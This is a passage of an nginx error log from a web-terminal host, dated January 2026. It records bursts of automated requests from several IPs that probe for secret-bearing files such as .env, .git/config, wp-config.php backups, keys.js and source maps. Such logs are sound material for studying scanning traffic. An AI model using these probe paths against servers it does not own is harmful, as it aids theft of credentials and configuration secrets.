185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/e929402614901c2ef599d15bc501af6dfbba1f5d843a7a80a273082588eeea94/sobreloja/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/plugin-qiankun/examples/app1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package-lock.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/7c2dd93aed15103586508689b0926f22cb22615eaa7027d6a140541577df9c26/ademypro/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/react-scripts/fixtures/kitchensink/template/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/048fa3053c370aea887f517323b190398c2fe523327c29711d24c2fe4c29fabc/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/81361875dcdb133893cbb29f77487781bd31d666647c61421b96dfa6e873787f/unicesumaradmissaodigital/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/af58896ce0256c58237b9bb2007f484e1439d89eeeda8499ab2488b301c046b3/petgenius/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/36b55042526fc51c735e1ac51f845e93c8d813af2fb6ad5c92d6fbcb2a03b0c4/meu-ingresso-2023/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/plugin-qiankun/examples/app3/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/e5b1aee992cb23b01a4716f2ca28034d950c65a9e9d5e136bbede53863b86857/nextadelivery/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/052355b33aa284cc76967061007eac6fefae9d406040fa0cba0cae3b11173189/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/11530e64f1040d92633c20c26d4c19fe92c2d9a22fffc9631b6101840a55a101/niche-links/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/plugin-analytics/src/fixtures/analytics-ga-key/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/plugin-qiankun/examples/master/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/185fc49e7cbfb81d04d4e36e96846104f364cc4dcf202d9da8ef4f93547a646d/interpali/live/404/xnull/xfalse/xfalse/de_de/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/cf757dcb0590456003b71427e18f8d45aa0fbb53a193e37cb6beccf0db6c843e/xxpressio/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/8a82f8172ed0fda7dbe314b70738018ff4693e866d72fbffe6fbb2f476d1bba5/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/e313c55db568951985459b8dc72a601bb19d68a4d9e27bb8bec8988c6534528e/unicesumaradmissaodigital/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/48c889d4f074be3c11d2a9aa14999e5c81e431800b5d4350cfc8b530999f8f57/isystempro2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/2b53c5ae6721d896f729102fbb2fb0f35196a11f5124ad2b509705367f9be49c/jwmlog2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/a8d0dbecfae07a8db959506db9dc23249690674e7d34c9ff8fd0ada5a3c9ee54/meu-ingresso-2023/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/784245312a05d33ae694c74388342d13cd25c74fdb72c84a0b8f0c20fb1b9baf/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/91bffd6b1bd42ff8acc67240c7a8b382e6c9639de98968c71d922e9248601390/crewlab-coachingtools/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/744aa7a9e0404e5ec9c1b3f4d4c2f063351d79e547f96be7c67518970f0bb51c/applypass/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/90a4f2e10656f9e1c80c0c66836218eead17a96e4dc8d49fb049fd00b90721ac/isystempro2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package/dynamic_js/2a3f09a40c9d3d29b51271b66fac894cdd514948311a82e82a458b43b4f8ff9b/applypass/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 15:15:50 [error] 309#309: *29598 web-terminal could not be resolved (2: Server failure), client: 34.87.102.239, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 15:15:50 [error] 309#309: *29598 web-terminal could not be resolved (2: Server failure), client: 34.87.102.239, server: terminal.profibot.hu, request: "GET /wordpress/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 17:06:51 [error] 315#315: *31128 web-terminal could not be resolved (2: Server failure), client: 34.6.202.236, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 19:22:23 [error] 316#316: *31213 web-terminal could not be resolved (2: Server failure), client: 85.11.167.4, server: terminal.profibot.hu, request: "POST / HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu" +2026/01/28 19:22:24 [error] 317#317: *31215 web-terminal could not be resolved (2: Server failure), client: 85.11.167.4, server: terminal.profibot.hu, request: "POST / HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu" +2026/01/28 19:30:17 [error] 317#317: *31219 web-terminal could not be resolved (2: Server failure), client: 45.148.10.238, server: terminal.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32812 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32809 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_app/immutable/entry/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32799 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/5.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32811 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /app/entry.client.tsx HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32794 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /.vite/manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32790 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32779 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /api/v1/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32788 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /index.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32805 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_astro/page.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32786 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/static/js/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32777 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32776 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /payment.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32774 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_nuxt/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32771 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /api/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32784 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /config/keys.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32804 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /config/index.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32785 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/asset-manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32825 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32818 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /vite.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32782 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32822 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/_buildManifest.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32819 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /js/app.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32816 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /src/env.d.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32814 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /window.env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32807 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_astro/hoisted.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32787 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32795 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/index.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32821 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32823 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /js/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32796 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/js/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32783 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /lib/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32827 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/main.chunk.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32780 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_app/immutable/chunks/singletons.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32820 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/bundle.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32839 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /asset-manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32837 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /src/env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32843 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_app/immutable/chunks/index.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32834 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /keys.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32857 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /js/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32852 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/1.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32835 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/index.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32841 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/bundle.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32829 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/js/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32853 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /workbox.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32842 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /api.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32826 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /.astro/types.d.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32860 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32833 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_nuxt/vendors.app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32840 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /vendor.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32817 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /__env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32832 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/solid.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32793 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/root.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32828 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /.cache/page-ssr/routes/render-page.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32824 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /bundle.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32801 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_nuxt/vendors.app.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32836 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32858 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/0.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32875 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32863 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /cart HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32859 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/static/js/bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32854 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/build/manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32838 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /app/root.tsx HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32831 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/build/entry.client.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32850 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /sw.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32830 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32880 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /assets/index.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32848 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32855 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/js/bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32844 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /env.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32868 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /runtime-config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32856 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32882 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /public/build/root.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32874 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_app/env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32862 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /dist/.vite/manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32878 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/runtime-main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32866 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/main.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 316#316: *32846 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/index.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32871 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /subscribe HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32879 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32847 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /static/js/4.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32867 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /_next/static/chunks/pages/_app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32884 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 317#317: *32851 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /js/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 318#318: *32872 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /build/q-manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32849 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, request: "GET /chunk.js.map HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 21:45:21 [error] 315#315: *32865 web-terminal could not be resolved (2: Server failure), client: 216.81.248.22, server: terminal.profibot.hu, 